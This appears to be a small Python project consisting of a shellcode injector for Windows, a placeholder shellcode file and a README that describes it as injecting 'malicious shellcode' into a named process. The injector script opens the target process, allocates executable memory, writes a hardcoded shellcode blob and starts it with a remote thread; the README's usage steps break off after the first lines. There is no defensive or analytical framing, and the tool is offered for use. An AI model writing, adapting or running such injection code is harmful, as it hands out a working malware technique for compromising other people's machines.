[
    {
        "file_name": "injector.py",
        "file_content": "import ctypes\nimport ctypes.wintypes\n\n# Define the necessary constants and structures\nPROCESS_ALL_ACCESS = 0x1F0FFF\nTH32CS_SNAPPROCESS = 0x00000002\nTH32CS_SNAPMODULE = 0x00000008\n\nclass PROCESSENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", ctypes.wintypes.DWORD),\n        (\"cntUsage\", ctypes.wintypes.DWORD),\n        (\"th32ProcessID\", ctypes.wintypes.DWORD),\n        (\"th32DefaultHeapID\", ctypes.wintypes.PULONG),\n        (\"th32ModuleID\", ctypes.wintypes.DWORD),\n        (\"cntThreads\", ctypes.wintypes.DWORD),\n        (\"th32ParentProcessID\", ctypes.wintypes.DWORD),\n        (\"pcPriClassBase\", ctypes.wintypes.LONG),\n        (\"dwFlags\", ctypes.wintypes.DWORD),\n        (\"szExeFile\", ctypes.c_char * 260)\n    ]\n\nclass MODULEENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", ctypes.wintypes.DWORD),\n        (\"th32ModuleID\", ctypes.wintypes.DWORD),\n        (\"th32ProcessID\", ctypes.wintypes.DWORD),\n        (\"GlblcntUsage\", ctypes.wintypes.DWORD),\n        (\"ProccntUsage\", ctypes.wintypes.DWORD),\n        (\"modBaseAddr\", ctypes.wintypes.LPVOID),\n        (\"modBaseSize\", ctypes.wintypes.DWORD),\n        (\"hModule\", ctypes.wintypes.HMODULE),\n        (\"szModule\", ctypes.c_char * 256),\n        (\"szExePath\", ctypes.c_char * 260)\n    ]\n\n# Function to find the process ID by name\ndef find_process_id(process_name):\n    hSnapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n    pe32 = PROCESSENTRY32()\n    pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)\n\n    if ctypes.windll.kernel32.Process32First(hSnapshot, ctypes.byref(pe32)):\n        while True:\n            if process_name.lower() in pe32.szExeFile.lower():\n                ctypes.windll.kernel32.CloseHandle(hSnapshot)\n                return pe32.th32ProcessID\n            if not ctypes.windll.kernel32.Process32Next(hSnapshot, ctypes.byref(pe32)):\n                break\n    ctypes.windll.kernel32.CloseHandle(hSnapshot)\n    return None\n\n# Function to find the base address of a module in a process\ndef find_module_base_address(process_id, module_name):\n    hSnapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPPROCESS, process_id)\n    me32 = MODULEENTRY32()\n    me32.dwSize = ctypes.sizeof(MODULEENTRY32)\n\n    if ctypes.windll.kernel32.Module32First(hSnapshot, ctypes.byref(me32)):\n        while True:\n            if module_name.lower() in me32.szModule.lower():\n                ctypes.windll.kernel32.CloseHandle(hSnapshot)\n                return me32.modBaseAddr\n            if not ctypes.windll.kernel32.Module32Next(hSnapshot, ctypes.byref(me32)):\n                break\n    ctypes.windll.kernel32.CloseHandle(hSnapshot)\n    return None\n\n# Function to inject shellcode into a process\ndef inject_shellcode(process_id, shellcode):\n    hProcess = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, process_id)\n    if not hProcess:\n        raise Exception(\"Failed to open process\")\n\n    # Allocate memory in the target process\n    alloc_mem_address = ctypes.windll.kernel32.VirtualAllocEx(hProcess, None, len(shellcode), 0x1000 | 0x2000, 0x40)\n    if not alloc_mem_address:\n        ctypes.windll.kernel32.CloseHandle(hProcess)\n        raise Exception(\"Failed to allocate memory in the target process\")\n\n    # Write the shellcode to the allocated memory\n    if not ctypes.windll.kernel32.WriteProcessMemory(hProcess, alloc_mem_address, shellcode, len(shellcode), None):\n        ctypes.windll.kernel32.CloseHandle(hProcess)\n        raise Exception(\"Failed to write shellcode to the target process\")\n\n    # Create a remote thread to execute the shellcode\n    thread_id = ctypes.wintypes.DWORD()\n    if not ctypes.windll.kernel32.CreateRemoteThread(hProcess, None, 0, alloc_mem_address, None, 0, ctypes.byref(thread_id)):\n        ctypes.windll.kernel32.CloseHandle(hProcess)\n        raise Exception(\"Failed to create remote thread\")\n\n    ctypes.windll.kernel32.CloseHandle(hProcess)\n    return thread_id.value\n\n# Main function to inject shellcode into WindowsConsoleClass\ndef main():\n    process_name = \"WindowsConsoleClass\"\n    module_name = \"WindowsConsoleClass.exe\"\n    shellcode = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x52\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\"  # Example shellcode\n\n    process_id = find_process_id(process_name)\n    if not process_id:\n        raise Exception(f\"Process {process_name} not found\")\n\n    module_base_address = find_module_base_address(process_id, module_name)\n    if not module_base_address:\n        raise Exception(f\"Module {module_name} not found in process {process_name}\")\n\n    thread_id = inject_shellcode(process_id, shellcode)\n    print(f\"Shellcode injected into process {process_name} with thread ID {thread_id}\")\n\nif __name__ == \"__main__\":\n    main()"
    },
    {
        "file_name": "shellcode.bin",
        "file_content": "# This file should contain the actual shellcode bytes. For demonstration, the shellcode is included directly in the injector.py file.\n# You can replace the shellcode in injector.py with the content of this file if needed."
    },
    {
        "file_name": "README.md",
        "file_content": "# WindowsConsoleClass Shellcode Injector\n\nThis script injects malicious shellcode into the `WindowsConsoleClass` process.\n\n## Files\n\n- `injector.py`: The main script for finding the process, allocating memory, writing shellcode, and creating a remote thread.\n- `shellcode.bin`: Contains the shellcode to be injected. Currently, the shellcode is hardcoded in `injector.py` for simplicity.\n\n## Usage\n\n1. Ensure you have Python installed on your system.\n2. Place the `injector.py` and `shellcode.bin` files in the same directory.\n3. Run the script:"
    }
]